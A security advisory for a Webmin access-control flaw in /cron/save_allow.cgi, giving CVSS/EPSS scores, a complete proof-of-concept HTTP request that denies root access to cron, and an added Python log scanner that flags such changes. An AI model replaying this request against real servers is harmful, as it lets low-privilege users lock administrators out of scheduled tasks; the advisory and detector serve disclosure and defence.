CVSS3: 8.1 High
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: LOW
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: NONE
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H

CVSS2: 5.5 Medium
Access Vector: NETWORK
Access Complexity: LOW
Authentication: SINGLE
Confidentiality Impact: NONE
Integrity Impact: PARTIAL
Availability Impact: PARTIAL
Vector: AV:N/AC:L/Au:S/C:N/I:P/A:P

EPSS: 0.002 Low
Percentile: 52.4%
The /cron/save_allow.cgi endpoint is accessible to any authenticated low-privilege user, letting them control which users may use cron jobs. They can allow or deny other users access to cron jobs, affecting the Scheduled Cron Jobs module.
GET http://{HOST}/cron/save_allow.cgi

This example request denies root access to cron:
GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1
Host: jumphost:10000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-no-links: 1
X-PJAX: true
X-PJAX-Container: [data-dcontainer]
X-PJAX-URL: save_allow.cgi
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://jumphost:10000/cron/edit_allow.cgi?xnavigation=1
Cookie: redirect=1; testing=1; sid=092a4f34132757770ba9c9c353760197
This vulnerability allows a user to modify or restrict access to a system function beyond that user's own permissions.
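As an added defender-side example (not part of this advisory or of Webmin itself), the following Python scans constructed access log lines for requests to /cron/save_allow.cgi and flags allow/deny changes made by non-admin accounts or that deny an admin. The log format, the admin account list, the meaning of the mode values and the comma/newline-separated user lists are assumptions.

```python
"""Flag access-log requests that change cron allow/deny lists (added example)."""
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined-log style (not real logs).
SAMPLE_LOG = """\
10.0.0.5 - alice [12/Mar/2024:10:01:02 +0000] "GET /cron/index.cgi HTTP/1.1" 200 5123
10.0.0.5 - alice [12/Mar/2024:10:01:09 +0000] "GET /cron/save_allow.cgi?allow=&mode=2&deny=root HTTP/1.1" 302 0
10.0.0.9 - root [12/Mar/2024:10:02:00 +0000] "GET /cron/save_allow.cgi?allow=root&mode=1&deny= HTTP/1.1" 302 0
10.0.0.7 - bob [12/Mar/2024:10:03:00 +0000] "POST /cron/save_allow.cgi HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d+)'
)

# Assumed meaning of the mode parameter, inferred from the advisory's request
# (mode=2 with deny=root denies root); not taken from Webmin's source.
MODE_NAMES = {"0": "all users allowed", "1": "only listed users (allow)",
              "2": "all except listed users (deny)"}

def _user_list(q, key):
    # Assumption: user lists arrive comma-, newline- or space-separated.
    return [u for u in re.split(r"[\s,]+", " ".join(q.get(key, []))) if u]

def parse_allow_events(log_text, admins=("root",)):
    """Return one dict per request to /cron/save_allow.cgi, with risk flags."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if url.path != "/cron/save_allow.cgi":
            continue
        q = parse_qs(url.query, keep_blank_values=True)
        allow, deny = _user_list(q, "allow"), _user_list(q, "deny")
        events.append({
            "user": m["user"], "ip": m["ip"], "method": m["method"],
            # POST parameters are not in the access log, so mode is unknown there.
            "mode": MODE_NAMES.get(q.get("mode", [""])[0], "unknown or in POST body"),
            "allow": allow, "deny": deny,
            "by_non_admin": m["user"] not in admins,
            "denies_admin": any(u in admins for u in deny),
        })
    return events

def flag_suspicious(log_text, admins=("root",)):
    """Events worth alerting on: changes by non-admins or changes locking out an admin."""
    return [e for e in parse_allow_events(log_text, admins)
            if e["by_non_admin"] or e["denies_admin"]]
```

Because a low-privilege session can reach the endpoint at all, any hit on /cron/save_allow.cgi from a non-admin account is the signal to alert on, regardless of the parameters carried.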